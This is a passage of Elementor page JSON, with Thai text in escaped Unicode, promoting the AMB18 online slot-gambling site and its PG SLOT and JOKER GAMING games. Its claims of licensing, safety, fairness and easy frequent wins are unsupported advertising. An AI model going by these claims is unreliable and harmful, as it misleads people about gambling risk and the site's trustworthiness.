\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\